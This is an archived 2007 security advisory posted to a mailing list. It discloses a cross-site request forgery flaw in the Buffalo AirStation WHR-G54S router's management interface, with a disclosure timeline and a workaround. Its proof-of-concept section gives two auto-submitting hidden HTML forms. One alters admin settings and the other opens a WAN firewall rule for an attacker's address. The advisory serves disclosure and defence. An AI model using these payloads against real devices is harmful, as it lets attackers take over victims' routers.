Hosting Provided By

Buffalo AirStation WHR-G54S CSRF vulnerability

From: Henri Lindberg - Smilehouse Oy <henri.lindberg(at)smilehouse.com>
Date: Fri Sep 07 2007 - 07:23:00 EDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

                          Louhi Networks Oy
                       -= Security Advisory =-


      Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
                vulnerability
  Release Date: 2007-09-07
 Last Modified: 2007-09-07
       Authors: Henri Lindberg, Associate of (ISC)²
                [henri d0t lindberg at louhi d0t fi]

Application: Buffalo AirStation Web Management

       Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
      Severity: Cross site request forgery in management interface
          Risk: Moderate
 Vendor Status: No response from vendor.
    References: 
http://www.louhi.fi/advisory/buffalo_070907.txt

Overview:

During cursory inspection of WHR-G54S it was discovered that a cross site request forgery vulnerability exists in the management interface. Thus, it is possible for an attacker to perform any administrative action in the management interface. These include e.g. changing administrative password or adding new firewall rules.

Details:

Buffalo AirStation WHR-G54S Ver.1.20 device management interface does not validate the origin of an HTTP request. If attacker is able to make user visit a hostile web page, a device can be controlled by submitting suitable forms. It is possible to add new users for example.

Successful attack requires that the attacker knows the management interface address for the target device. As authentication is done using HTTP Basic authentication, exploiting this vulnerability requires more effort compared to forms authentication.

Proof of Concept:

Do you need help?

<html>

<body onload="document.CSRF.submit()"> <form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html "style="display:none">

</form>
</body>
</html>

Note: ropass value is reversed edit_ropass value.

<html>

<body onload="document.CSRF.submit()"> <form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html" style="display:none">

<input name="sela" value="ACCEPT">
<input name="sel_direction" value="WAN">
<input name="H_sour_ip" value="1.1.1.1">
<input name="H_dest_ip" value="">
<input name="H_prt" value="all">
<input name="Do_ADDtop" value="Add%A0%28Head%29">

</form>
</body>
</html>

1.1.1.1 = attacker's IP address

Workaround:

Do not browse untrusted websites while using the management interface.

Do you need more help?

Log out after administering the device.

More information

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Disclosure Timeline:

    XX  July 2007       - Discovered the issue
    15. August 2007     - Contacted Buffalo
    17. August 2007     - Contacted Buffalo again.
    7.  September 2007  - No response from Vendor.
    7.  September 2007  - Advisory released

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3 Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
=+E8f
-----END PGP SIGNATURE----- Received on Fri Sep 7 11:25:47 2007

This message: [ Message body ]
Next message: security(at)mandriva.com: "[ MDKSA-2007:177 ] - Updated MySQL packages fix vulnerabilities"
Previous message: Foresight Linux Essential Announcement Service: "FLEA-2007-0050-1 krb5 krb5-workstation"
Next in thread: Adrian P: "Re: Buffalo AirStation WHR-G54S CSRF vulnerability"
Reply: Adrian P: "Re: Buffalo AirStation WHR-G54S CSRF vulnerability"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:14:50 EDT

Can we help you?